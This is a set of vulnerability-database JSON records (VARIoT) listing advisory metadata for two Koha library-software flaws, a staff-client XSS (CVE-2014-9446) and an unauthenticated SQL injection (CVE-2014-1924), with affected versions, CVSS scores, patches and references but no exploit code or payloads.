      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "http://www.securityfocus.com/bid/71803"
      },
      {
        "trust": 1.6,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
      },
      {
        "trust": 1.6,
        "url": "http://koha-community.org/koha-3-16-6-release/"
      },
      {
        "trust": 1.6,
        "url": "http://koha-community.org/koha-3-18-2-release/"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/61187"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9446"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9446"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "db": "BID",
        "id": "71803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "db": "BID",
        "id": "71803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-12-31T00:00:00",
        "db": "IVD",
        "id": "ad18394a-2351-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2014-12-31T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "date": "2014-12-27T00:00:00",
        "db": "BID",
        "id": "71803"
      },
      {
        "date": "2015-01-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "date": "2014-12-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      },
      {
        "date": "2015-01-02T20:59:04.930000",
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-12-31T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-09234"
      },
      {
        "date": "2015-01-06T00:05:00",
        "db": "BID",
        "id": "71803"
      },
      {
        "date": "2015-01-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      },
      {
        "date": "2015-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      },
      {
        "date": "2024-11-21T02:20:54.557000",
        "db": "NVD",
        "id": "CVE-2014-9446"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha of  Staff Client cross-site scripting vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007487"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201412-537"
      }
    ],
    "trust": 0.6
  }
}

var-202001-1230
Vulnerability from variot

The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors. Koha contains an SQL injection vulnerability. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may result. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability 2. A directory-traversal vulnerability 3. An arbitrary file-write vulnerability 4. An SQL-injection vulnerability. An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1230",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.08.23"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.03"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.13"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.22"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.2"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.9"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.12"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.23"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.3"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.13"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Chris Cormack, Galen Charlton, and John Lightsey",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-1924",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2014-1924",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2014-1924",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2014-1924",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-1924",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-1924",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202001-1090",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive  information on the affected application. This may aid in further  attacks",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-1924"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-1924",
        "trust": 2.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/07/10",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/10/3",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1090",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "65448",
        "trust": 0.3
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "id": "VAR-202001-1230",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5804196
  },
  "last_update_date": "2024-11-23T22:16:39.958000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug\u00a011666 Koha",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
      },
      {
        "title": "Koha SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112801"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.0
      },
      {
        "problemtype": "SQL injection (CWE-89) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
      },
      {
        "trust": 1.9,
        "url": "http://koha-community.org/security-release-february-2014/"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1924"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "date": "2020-01-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      },
      {
        "date": "2020-01-24T17:15:12.327000",
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      },
      {
        "date": "2021-01-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      },
      {
        "date": "2024-11-21T02:05:17.070000",
        "db": "NVD",
        "id": "CVE-2014-1924"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha\u00a0 In \u00a0SQL\u00a0 Injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008839"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1090"
      }
    ],
    "trust": 0.6
  }
}